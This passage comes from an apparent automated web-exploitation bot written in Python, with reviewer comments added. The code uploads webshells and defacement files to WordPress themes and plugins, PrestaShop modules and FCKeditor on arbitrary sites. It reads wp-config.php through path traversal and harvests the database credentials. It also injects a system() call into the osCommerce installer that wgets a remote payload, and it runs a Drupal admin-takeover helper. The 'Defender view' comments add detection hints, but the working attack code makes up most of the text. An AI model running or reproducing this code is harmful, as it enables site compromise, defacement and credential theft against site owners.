  1780. ShellCheck = requests.get('http://' + site +
  1781. '/wp-content/themes/medicate/script/revslider/temp/update_extract/vuln.php', timeout=5)
  1782. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
  1783. self.Print_vuln_Shell(
  1784. site + '/wp-content/themes/medicate/script/revslider/temp/update_extract/vuln.php')
  1785. with open('result/Shell_results.txt', 'a') as writer:
  1786. writer.write(
  1787. site + '/wp-content/themes/medicate/script/revslider/temp/update_extract/vuln.php' + '\n')
  1788. self.Print_Vuln_index(
  1789. site + '/wp-content/themes/medicate/script/revslider/temp/update_extract/pwn.gif')
  1790. with open('result/Index_results.txt', 'a') as writer:
  1791. writer.write(
  1792. site + '/wp-content/themes/medicate/script/revslider/temp/update_extract/pwn.gif' + '\n')
  1793. self.Revslider_Config(site)
  1794. else:
  1795. self.Revslider_Config(site)
  1796. elif '/wp-content/themes/centum/' in CheckRevslider.text.encode('utf-8'):
  1797. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  1798. CheckRev6 = requests.get('http://' + site +
  1799. '/wp-content/themes/centum/revslider/temp/update_extract/pwn.gif', timeout=5)
  1800. if 'GIF89a' in CheckRev6.text.encode('utf-8'):
  1801. ShellCheck = requests.get('http://' + site +
  1802. '/wp-content/themes/centum/revslider/temp/update_extract/vuln.php', timeout=5)
  1803. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
  1804. self.Print_vuln_Shell(
  1805. site + '/wp-content/themes/centum/revslider/temp/update_extract/vuln.php')
  1806. with open('result/Shell_results.txt', 'a') as writer:
  1807. writer.write(
  1808. site + '/wp-content/themes/centum/revslider/temp/update_extract/vuln.php' + '\n')
  1809. self.Print_Vuln_index(site + '/wp-content/themes/centum/revslider/temp/update_extract/pwn.gif')
  1810. with open('result/Index_results.txt', 'a') as writer:
  1811. writer.write(
  1812. site + '/wp-content/themes/centum/revslider/temp/update_extract/pwn.gif' + '\n')
  1813. self.Revslider_Config(site)
  1814. else:
  1815. self.Revslider_Config(site)
  1816. elif '/wp-content/themes/beach_apollo/' in CheckRevslider.text.encode('utf-8'):
  1817. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  1818. CheckRev7 = requests.get('http://' + site +
  1819. '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
  1820. if 'GIF89a' in CheckRev7.text.encode('utf-8'):
  1821. ShellCheck = requests.get('http://' + site +
  1822. '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
  1823. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
  1824. self.Print_vuln_Shell(
  1825. site + '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/vuln.php')
  1826. with open('result/Shell_results.txt', 'a') as writer:
  1827. writer.write(
  1828. site + '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/vuln.php' + '\n')
  1829. self.Print_Vuln_index(
  1830. site + '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/pwn.gif')
  1831. with open('result/Index_results.txt', 'a') as writer:
  1832. writer.write(
  1833. site + '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
  1834. self.Revslider_Config(site)
  1835. else:
  1836. self.Revslider_Config(site)
  1837. elif '/wp-content/themes/cuckootap/' in CheckRevslider.text.encode('utf-8'):
  1838. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  1839. CheckRev8 = requests.get('http://' + site +
  1840. '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
  1841. if 'GIF89a' in CheckRev8.text.encode('utf-8'):
  1842. ShellCheck = requests.get('http://' + site +
  1843. '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
  1844. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
  1845. self.Print_vuln_Shell(
  1846. site + '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/vuln.php')
  1847. with open('result/Shell_results.txt', 'a') as writer:
  1848. writer.write(
  1849. site + '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
  1850. self.Print_Vuln_index(
  1851. site + '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/pwn.gif')
  1852. with open('result/Index_results.txt', 'a') as writer:
  1853. writer.write(
  1854. site + '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
  1855. self.Revslider_Config(site)
  1856. else:
  1857. self.Revslider_Config(site)
  1858. elif '/wp-content/themes/pindol/' in CheckRevslider.text.encode('utf-8'):
  1859. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  1860. CheckRev9 = requests.get('http://' + site +
  1861. '/wp-content/themes/pindol/revslider/temp/update_extract/pwn.gif', timeout=5)
  1862. if 'GIF89a' in CheckRev9.text.encode('utf-8'):
  1863. ShellCheck = requests.get('http://' + site +
  1864. '/wp-content/themes/pindol/revslider/temp/update_extract/vuln.php', timeout=5)
  1865. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
  1866. self.Print_vuln_Shell(
  1867. site + '/wp-content/themes/pindol/revslider/temp/update_extract/vuln.php')
  1868. with open('result/Shell_results.txt', 'a') as writer:
  1869. writer.write(
  1870. site + '/wp-content/themes/pindol/revslider/temp/update_extract/vuln.php' + '\n')
  1871. self.Print_Vuln_index(site + '/wp-content/themes/pindol/revslider/temp/update_extract/pwn.gif')
  1872. with open('result/Index_results.txt', 'a') as writer:
  1873. writer.write(
  1874. site + '/wp-content/themes/pindol/revslider/temp/update_extract/pwn.gif' + '\n')
  1875. self.Revslider_Config(site)
  1876. else:
  1877. self.Revslider_Config(site)
  1878. elif '/wp-content/themes/designplus/' in CheckRevslider.text.encode('utf-8'):
  1879. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  1880. CheckRev10 = requests.get('http://' + site +
  1881. '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
  1882. if 'GIF89a' in CheckRev10.text.encode('utf-8'):
  1883. ShellCheck = requests.get('http://' + site +
  1884. '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
  1885. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
  1886. self.Print_vuln_Shell(
  1887. site + '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/vuln.php')
  1888. with open('result/Shell_results.txt', 'a') as writer:
  1889. writer.write(
  1890. site + '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
  1891. self.Print_Vuln_index(
  1892. site + '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/pwn.gif')
  1893. with open('result/Index_results.txt', 'a') as writer:
  1894. writer.write(
  1895. site + '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
  1896. self.Revslider_Config(site)
  1897. else:
  1898. self.Revslider_Config(site)
  1899. elif '/wp-content/themes/rarebird/' in CheckRevslider.text.encode('utf-8'):
  1900. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  1901. CheckRev11 = requests.get('http://' + site +
  1902. '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
  1903. if 'GIF89a' in CheckRev11.text.encode('utf-8'):
  1904. ShellCheck = requests.get('http://' + site +
  1905. '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
  1906. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
  1907. self.Print_vuln_Shell(
  1908. site + '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/vuln.php')
  1909. with open('result/Shell_results.txt', 'a') as writer:
  1910. writer.write(
  1911. site + '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
  1912. self.Print_Vuln_index(
  1913. site + '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/pwn.gif')
  1914. with open('result/Index_results.txt', 'a') as writer:
  1915. writer.write(
  1916. site + '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
  1917. self.Revslider_Config(site)
  1918.  
  1919. else:
  1920. self.Revslider_Config(site)
  1921. elif '/wp-content/themes/Avada/' in CheckRevslider.text.encode('utf-8'):
  1922. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  1923. CheckRev12 = requests.get('http://' + site +
  1924. '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
  1925. if 'GIF89a' in CheckRev12.text.encode('utf-8'):
  1926. ShellCheck = requests.get('http://' + site +
  1927. '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
  1928. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
  1929. self.Print_vuln_Shell(
  1930. site + '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/vuln.php')
  1931. with open('result/Shell_results.txt', 'a') as writer:
  1932. writer.write(
  1933. site + '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
  1934. self.Print_Vuln_index(
  1935. site + '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/pwn.gif')
  1936. with open('result/Index_results.txt', 'a') as writer:
  1937. writer.write(
  1938. site + '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
  1939. self.Revslider_Config(site)
  1940. else:
  1941. self.Revslider_Config(site)
  1942. else:
  1943. self.Print_NotVuln('revslider', site)
        # Any exception in any branch is reported as "not vulnerable".
  1944. except:
  1945. self.Print_NotVuln('revslider', site)
  1946.  
  1947. def Revslider_Config(self, site):
        # Requests /wp-admin/admin-ajax.php with action=revslider_show_image and
        # img=../wp-config.php (a path traversal through the slider's image handler) and
        # treats a body containing 'DB_PASSWORD' as a successful read of the WordPress config.
        # On a hit the request URL and the regex-extracted DB_HOST / DB_USER / DB_PASSWORD /
        # DB_NAME values are appended to result/Config_results.txt.
        # Every visible path, including both bare except handlers, ends in
        # self.Revslider_css(site) (nesting inferred; the paste lost its indentation).
        # Defender view: access-log entries for admin-ajax.php whose img parameter contains
        # '../' or 'wp-config.php' are the trace; update or remove the slider plugin and
        # rotate the database credentials if such a request was answered with the config.
  1948. try:
  1949. Exp = 'http://' + site + \
  1950. '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
  1951. GetConfig = requests.get(Exp, timeout=5)
  1952. if 'DB_PASSWORD' in GetConfig.text.encode('utf-8'):
  1953. self.Print_vuln_Config(site)
  1954. with open('result/Config_results.txt', 'a') as ww:
  1955. ww.write('Full Config Path : ' + Exp + '\n')
  1956. try:
  1957. Gethost = re.findall("'DB_HOST', '(.*)'", GetConfig.text.encode('utf-8'))
  1958. Getuser = re.findall("'DB_USER', '(.*)'", GetConfig.text.encode('utf-8'))
  1959. Getpass = re.findall("'DB_PASSWORD', '(.*)'", GetConfig.text.encode('utf-8'))
  1960. Getdb = re.findall("'DB_NAME', '(.*)'", GetConfig.text.encode('utf-8'))
  1961. with open('result/Config_results.txt', 'a') as ww:
  1962. ww.write(' Host: ' + Gethost[0] + '\n' + ' user: ' + Getuser[0] +
  1963. '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
  1964. 0] + '\n---------------------\n')
  1965. self.Revslider_css(site)
  1966. except:
  1967. self.Revslider_css(site)
  1968. else:
  1969. self.Revslider_css(site)
  1970. except:
  1971. self.Revslider_css(site)
  1972.  
  1973. def viral_optins(self, site):
        # Posts the local file self.TextindeX as multipart field 'Filedata' (sent as
        # 'vuln.txt') to /wp-content/plugins/viral-optins/api/uploader/file-uploader.php;
        # the request carries no cookies or credentials.
        # A reply containing 'id="wpvimgres"' is taken as an accepted upload; the file is then
        # looked for under /wp-content/uploads/20<yy>/<mm>/ and at the URL found in the
        # reply's <img src>, using the 'Vuln!!' marker. Hits go to result/Index_results.txt.
        # Any exception is reported as "not vulnerable" by the bare except.
        # Defender view: POSTs to file-uploader.php and an unexpected vuln.txt in the monthly
        # uploads folder are the traces; remove or update the plugin and keep the uploader
        # endpoint unreachable without authentication.
  1974. try:
  1975. defaceFile = {
  1976. 'Filedata': ('vuln.txt', open(self.TextindeX, 'rb'), 'text/html')
  1977. }
  1978. x = requests.post('http://' + site + '/wp-content/plugins/viral-optins/api/uploader/file-uploader.php',
  1979. files=defaceFile, timeout=5)
  1980. if 'id="wpvimgres"' in x.text.encode('utf-8'):
  1981. uploader = site + '/wp-content/uploads/20' + self.year + '/' + self.month + '/vuln.txt'
  1982. GoT = requests.get('http://' + uploader, timeout=5)
  1983. find = re.findall('<img src="http://(.*)" height="', x.text.encode('utf-8'))
  1984. GoT2 = requests.get('http://' + find[0], timeout=5)
  1985. print find[0]
  1986. if 'Vuln!!' in GoT.text.encode('utf-8'):
  1987. self.Print_Vuln_index(site + '/wp-content/uploads/20' + self.year + '/' + self.month + '/vuln.txt')
  1988. with open('result/Index_results.txt', 'a') as writer:
  1989. writer.write(site + '/wp-content/uploads/20' + self.year + '/' + self.month + '/vuln.txt' + '\n')
  1990. elif 'Vuln!!' in GoT2.text.encode('utf-8'):
  1991. self.Print_Vuln_index(find[0])
  1992. with open('result/Index_results.txt', 'a') as writer:
  1993. writer.write(site + find[0] + '\n')
  1994. else:
  1995. self.Print_NotVuln('viral optins', site)
  1996. else:
  1997. self.Print_NotVuln('viral optins', site)
  1998. except:
  1999. self.Print_NotVuln('viral optins', site)
  2000.  
  2001.  
  2002. def Woocomrece(self, site):
        # Posts the local file self.pagelinesExploitShell to /wp-admin/admin-ajax.php with
        # action=nm_personalizedproduct_upload_file and name=upload.php, without cookies or
        # credentials. An HTTP 200 alone (or 'success' in the body) counts as accepted.
        # It then requests /wp-content/uploads/product_files/upload.php, /wp-content/vuln.php
        # and /vuln.htm and looks for the 'Vuln!!' marker in each; hits are appended to
        # result/Shell_results.txt and result/Index_results.txt.
        # Defender view: admin-ajax.php POSTs carrying that action, and PHP files appearing in
        # uploads/product_files/, are the traces; update or remove the plugin that registers
        # the action and deny script execution under wp-content/uploads.
  2003. try:
  2004. Exp = 'http://' + site + '/wp-admin/admin-ajax.php'
  2005. Postdata = {'action': 'nm_personalizedproduct_upload_file', 'name': 'upload.php'}
  2006. FileData = {'file': (self.pagelinesExploitShell.split('/')[1], open(self.pagelinesExploitShell, 'rb'),
  2007. 'multipart/form-data')}
  2008. GoT = requests.post(Exp, files=FileData, data=Postdata, timeout=5)
  2009. if GoT.status_code == 200 or 'success' in GoT.text.encode('utf-8'):
  2010. UploadPostPath = 'http://' + site + '/wp-content/uploads/product_files/upload.php'
  2011. CheckShell = requests.get(UploadPostPath, timeout=5)
  2012. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  2013. shellChecker = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
  2014. if 'Vuln!!' in shellChecker.text.encode('utf-8'):
  2015. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
  2016. with open('result/Shell_results.txt', 'a') as writer:
  2017. writer.write(site + '/wp-content/vuln.php' + '\n')
  2018. IndexCheck = requests.get('http://' + site + '/vuln.htm', timeout=5)
  2019. if 'Vuln!!' in IndexCheck.text.encode('utf-8'):
  2020. self.Print_Vuln_index(site + '/vuln.htm')
  2021. with open('result/Index_results.txt', 'a') as writer:
  2022. writer.write(site + '/vuln.htm' + '\n')
  2023. else:
  2024. self.Print_NotVuln('Woocomrece', site)
  2025. else:
  2026. self.Print_NotVuln('Woocomrece', site)
  2027. else:
  2028. self.Print_NotVuln('Woocomrece', site)
  2029. except:
  2030. self.Print_NotVuln('Woocomrece', site)
  2031.  
  2032.  
  2033. def FckPath(self, zzz):
        # Helper: returns the first capture of the regex ,"(.*)"," in zzz, stripped of
        # surrounding whitespace. FckEditor() passes it the connector's upload reply.
        # Any failure (no match, non-string input) is swallowed by the bare except, so the
        # function then returns None implicitly.
  2034. try:
  2035. find = re.findall(',"(.*)","', zzz)
  2036. path = find[0].strip()
  2037. return path
  2038. except:
  2039. pass
  2040.  
  2041. def FckEditor(self, site):
        # Probes /fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media and takes
        # 'OnUploadCompleted(202' in the reply as a sign that the upload connector is enabled.
        # It then posts the local file self.Jce_Deface_image as field 'NewFile'; if the reply
        # mentions '.gif', the stored path is parsed with FckPath() and fetched, and a
        # 'GIF89a' body is recorded in result/Index_results.txt.
        # Both bare except handlers report "not vulnerable" on any error.
        # Defender view: requests to the connectors/php/upload.php path are the trace; disable
        # or remove the file-manager connector, or place it behind authentication.
  2042. try:
  2043. exp2 = '/fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media'
  2044. try:
  2045. CheckVuln = requests.get('http://' + site + exp2, timeout=5)
  2046. if 'OnUploadCompleted(202' in CheckVuln.text.encode('utf-8'):
  2047. headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0',
  2048. 'Accept': '*/*'}
  2049. exp = 'http://' + site + exp2
  2050. po = {'Content_Type': 'form-data'}
  2051. fil = {'NewFile': open(self.Jce_Deface_image, 'rb')}
  2052. rr = requests.post(exp, data=po, headers=headers, timeout=10, files=fil)
  2053. if '.gif' in rr.text.encode('utf-8'):
  2054. zart = self.FckPath(rr.text.encode('utf-8'))
  2055. x = 'http://' + site + str(zart)
  2056. wcheck2 = requests.get(x, timeout=5)
  2057. if wcheck2.status_code == 200:
  2058. check_deface = requests.get(x, timeout=10)
  2059. if 'GIF89a' in check_deface.text.encode('utf-8'):
  2060. self.Print_Vuln_index(site + str(zart))
  2061. with open('result/Index_results.txt', 'a') as writer:
  2062. writer.write(site + str(zart) + '\n')
  2063. else:
  2064. self.Print_NotVuln('fckeditor', site)
  2065. else:
  2066. self.Print_NotVuln('fckeditor', site)
  2067. else:
  2068. self.Print_NotVuln('fckeditor', site)
  2069. else:
  2070. self.Print_NotVuln('fckeditor', site)
  2071. except:
  2072. self.Print_NotVuln('fckeditor', site)
  2073. except:
  2074. self.Print_NotVuln('fckeditor', site)
  2075.  
  2076. def Drupal_Sqli_Addadmin(self, site):
        # Shells out to a separate script, files/adminTakeoverdupal.py, with the target URL
        # and the fixed pair -u pwndrupal -p pwndrupal. The helper is not part of this view;
        # presumably it creates an account with those values (confirm against the helper).
        # NOTE(review): site is concatenated into an os.system() command line unquoted, so
        # the target list is shell input on the machine that runs this script; anyone
        # analysing the tool should treat host lists as untrusted and run it only in a sandbox.
        # Defender view: a Drupal user named 'pwndrupal' is the indicator to search for.
  2077. os.system('python files/adminTakeoverdupal.py -t http://' + site + ' -u pwndrupal -p pwndrupal')
  2078.  
  2079. def osCommerce(self, site):
        # Probes /install/index.php (an HTTP 200 alone is accepted) and then posts to
        # /install/install.php?step=4 with a DB_DATABASE value that closes a quoted string
        # and appends a system() call; the follow-up GET of /install/includes/configure.php
        # suggests that the installer writes the value into that file, where it then runs.
        # First pass writes a marker file and checks /vuln.htm; second pass (errors ignored)
        # fetches a payload with wget and checks /install/includes/vuln.php.
        # Results are appended to result/Index_results.txt and result/Shell_results.txt.
        # Defender view: an /install/ directory still reachable after setup is the
        # precondition. Traces are POSTs to install.php?step=4, a configure.php under
        # install/includes containing 'system(', and the files vuln.htm, OsComPayLoad.php or
        # vuln.php. Deleting the install directory after installation removes the path.
  2080. try:
  2081. CheckVuln = requests.get('http://' + site + '/install/index.php', timeout=5)
  2082. if 'Welcome to osCommerce' in CheckVuln.text.encode('utf-8') or CheckVuln.status_code == 200:
  2083. Exp = site + '/install/install.php?step=4'
  2084. data = {
  2085. 'DIR_FS_DOCUMENT_ROOT': './'
  2086. }
  2087. shell = '\');'
  2088. shell += 'system("wget https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/OsComPayLoad.php");'
  2089. shell += '/*'
  2090. deface = '\');'
  2091. deface += 'system("echo Vuln!! patch it Now!> ../../vuln.htm");'
  2092. deface += '/*'
  2093. data['DB_DATABASE'] = deface
  2094. r = requests.post(url='http://' + Exp, data=data, timeout=5)
  2095. if r.status_code == 200:
  2096. requests.get('http://' + site + '/install/includes/configure.php', timeout=5)
  2097. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
  2098. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
  2099. self.Print_Vuln_index(site + '/vuln.htm')
  2100. with open('result/Index_results.txt', 'a') as writer:
  2101. writer.write(site + '/vuln.txt' + '\n')
  2102. try:
  2103. data['DB_DATABASE'] = shell
  2104. requests.post(url='http://' + Exp, data=data, timeout=5)
  2105. requests.get('http://' + site + '/install/includes/configure.php', timeout=5)
  2106. requests.get('http://' + site + '/install/includes/OsComPayLoad.php', timeout=5)
  2107. Checkshell = requests.get('http://' + site + '/install/includes/vuln.php', timeout=5)
  2108. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
  2109. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
  2110. with open('result/Shell_results.txt', 'a') as writer:
  2111. writer.write(site + '/wp-content/vuln.php' + '\n')
  2112. except:
  2113. pass
  2114. else:
  2115. self.Print_NotVuln('osCommerce RCE', site)
  2116. else:
  2117. self.Print_NotVuln('osCommerce RCE', site)
  2118. else:
  2119. self.Print_NotVuln('osCommerce RCE', site)
  2120. except:
  2121. self.Print_NotVuln('osCommerce RCE', site)
  2122.  
  2123. def columnadverts(self, site):
        # Posts the local file self.Jce_Deface_image as multipart field 'userfile' to
        # /modules/columnadverts/uploadimage.php, with no session or credentials.
        # If the reply contains 'success', the file is looked for under
        # /modules/columnadverts/slides/ ('GIF89a' header); the upload is then repeated with
        # self.ShellPresta (set outside this view) and checked for the 'Vuln!!' marker.
        # Hits are appended to result/Index_results.txt and result/Shell_results.txt.
        # Defender view: POSTs to uploadimage.php and unexpected files in slides/ are the
        # traces; remove or update the module and deny script execution in that directory.
  2124. try:
  2125. Exp = site + '/modules/columnadverts/uploadimage.php'
  2126. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
  2127. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
  2128. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
  2129. if 'success' in GoT.text.encode('utf-8'):
  2130. IndexPath = '/modules/columnadverts/slides/' + self.Jce_Deface_image.split('/')[1]
  2131. CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
  2132. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2133. self.Print_Vuln_index(IndexPath)
  2134. with open('result/Index_results.txt', 'a') as writer:
  2135. writer.write(IndexPath + '\n')
  2136. requests.post('http://' + Exp, files=FileDataShell, timeout=5)
  2137. ShellPath = '/modules/columnadverts/slides/' + self.ShellPresta.split('/')[1]
  2138. CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
  2139. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  2140. self.Print_vuln_Shell(site + ShellPath)
  2141. with open('result/Shell_results.txt', 'a') as writer:
  2142. writer.write(site + ShellPath + '\n')
  2143. else:
  2144. self.Print_NotVuln('columnadverts', site)
  2145. else:
  2146. self.Print_NotVuln('columnadverts', site)
  2147. except:
  2148. self.Print_NotVuln('columnadverts', site)
  2149.  
  2150. def soopamobile(self, site):
        # Same upload probe as the other /modules/*/uploadimage.php routines in this class,
        # here against /modules/soopamobile/uploadimage.php with multipart field 'userfile'.
        # 'success' in the reply leads to a check of /modules/soopamobile/slides/ for the
        # image ('GIF89a') and, after a second upload of self.ShellPresta, for 'Vuln!!'.
        # The recorded entries are the site-relative paths only (no host is prepended).
        # Defender view: POSTs to uploadimage.php and new files in slides/ are the traces;
        # remove or update the module and deny script execution in that directory.
  2151. try:
  2152. Exp = site + '/modules/soopamobile/uploadimage.php'
  2153. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
  2154. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
  2155. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
  2156. if 'success' in GoT.text.encode('utf-8'):
  2157. IndexPath = '/modules/soopamobile/slides/' + self.Jce_Deface_image.split('/')[1]
  2158. CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
  2159. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2160. self.Print_Vuln_index(IndexPath)
  2161. with open('result/Index_results.txt', 'a') as writer:
  2162. writer.write(IndexPath + '\n')
  2163. requests.post('http://' + Exp, files=FileDataShell, timeout=5)
  2164. ShellPath = '/modules/soopamobile/slides/' + self.ShellPresta.split('/')[1]
  2165. CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
  2166. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  2167. self.Print_vuln_Shell(ShellPath)
  2168. with open('result/Shell_results.txt', 'a') as writer:
  2169. writer.write(ShellPath + '\n')
  2170. else:
  2171. self.Print_NotVuln('soopamobile', site)
  2172. else:
  2173. self.Print_NotVuln('soopamobile', site)
  2174. except:
  2175. self.Print_NotVuln('soopamobile', site)
  2176.  
  2177.  
  2178. def soopabanners(self, site):
        # Upload probe against /modules/soopabanners/uploadimage.php (multipart field
        # 'userfile', no session or credentials). On 'success' it checks
        # /modules/soopabanners/slides/ for the image ('GIF89a'), uploads self.ShellPresta
        # the same way and checks for the 'Vuln!!' marker; hits go to the result/ files.
        # Any exception is reported as "not vulnerable" by the bare except.
        # Defender view: POSTs to uploadimage.php and new files in slides/ are the traces;
        # remove or update the module and deny script execution in that directory.
  2179. try:
  2180. Exp = site + '/modules/soopabanners/uploadimage.php'
  2181. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
  2182. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
  2183. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
  2184. if 'success' in GoT.text.encode('utf-8'):
  2185. IndexPath = '/modules/soopabanners/slides/' + self.Jce_Deface_image.split('/')[1]
  2186. CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
  2187. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2188. self.Print_Vuln_index(IndexPath)
  2189. with open('result/Index_results.txt', 'a') as writer:
  2190. writer.write(IndexPath + '\n')
  2191. requests.post('http://' + Exp, files=FileDataShell, timeout=5)
  2192. ShellPath = '/modules/soopabanners/slides/' + self.ShellPresta.split('/')[1]
  2193. CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
  2194. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  2195. self.Print_vuln_Shell(ShellPath)
  2196. with open('result/Shell_results.txt', 'a') as writer:
  2197. writer.write(ShellPath + '\n')
  2198. else:
  2199. self.Print_NotVuln('soopabanners', site)
  2200. else:
  2201. self.Print_NotVuln('soopabanners', site)
  2202. except:
  2203. self.Print_NotVuln('soopabanners', site)
  2204.  
  2205.  
  2206. def vtermslideshow(self, site):
        # Upload probe against /modules/vtermslideshow/uploadimage.php (multipart field
        # 'userfile', no session or credentials). On 'success' it checks
        # /modules/vtermslideshow/slides/ for the image ('GIF89a'), uploads self.ShellPresta
        # the same way and checks for the 'Vuln!!' marker; hits go to the result/ files.
        # Defender view: POSTs to uploadimage.php and new files in slides/ are the traces;
        # remove or update the module and deny script execution in that directory.
  2207. try:
  2208. Exp = site + '/modules/vtermslideshow/uploadimage.php'
  2209. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
  2210. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
  2211. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
  2212. if 'success' in GoT.text.encode('utf-8'):
  2213. IndexPath = '/modules/vtermslideshow/slides/' + self.Jce_Deface_image.split('/')[1]
  2214. CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
  2215. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2216. self.Print_Vuln_index(IndexPath)
  2217. with open('result/Index_results.txt', 'a') as writer:
  2218. writer.write(IndexPath + '\n')
  2219. requests.post('http://' + Exp, files=FileDataShell, timeout=5)
  2220. ShellPath = '/modules/vtermslideshow/slides/' + self.ShellPresta.split('/')[1]
  2221. CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
  2222. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  2223. self.Print_vuln_Shell(ShellPath)
  2224. with open('result/Shell_results.txt', 'a') as writer:
  2225. writer.write(ShellPath + '\n')
  2226. else:
  2227. self.Print_NotVuln('vtermslideshow', site)
  2228. else:
  2229. self.Print_NotVuln('vtermslideshow', site)
  2230. except:
  2231. self.Print_NotVuln('vtermslideshow', site)
  2232.  
  2233. def simpleslideshow(self, site):
        # Upload probe against /modules/simpleslideshow/uploadimage.php (multipart field
        # 'userfile', no session or credentials). On 'success' it checks
        # /modules/simpleslideshow/slides/ for the image ('GIF89a'), uploads self.ShellPresta
        # the same way and checks for the 'Vuln!!' marker; hits go to the result/ files.
        # Defender view: POSTs to uploadimage.php and new files in slides/ are the traces;
        # remove or update the module and deny script execution in that directory.
  2234. try:
  2235. Exp = site + '/modules/simpleslideshow/uploadimage.php'
  2236. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
  2237. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
  2238. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
  2239. if 'success' in GoT.text.encode('utf-8'):
  2240. IndexPath = '/modules/simpleslideshow/slides/' + self.Jce_Deface_image.split('/')[1]
  2241. CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
  2242. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
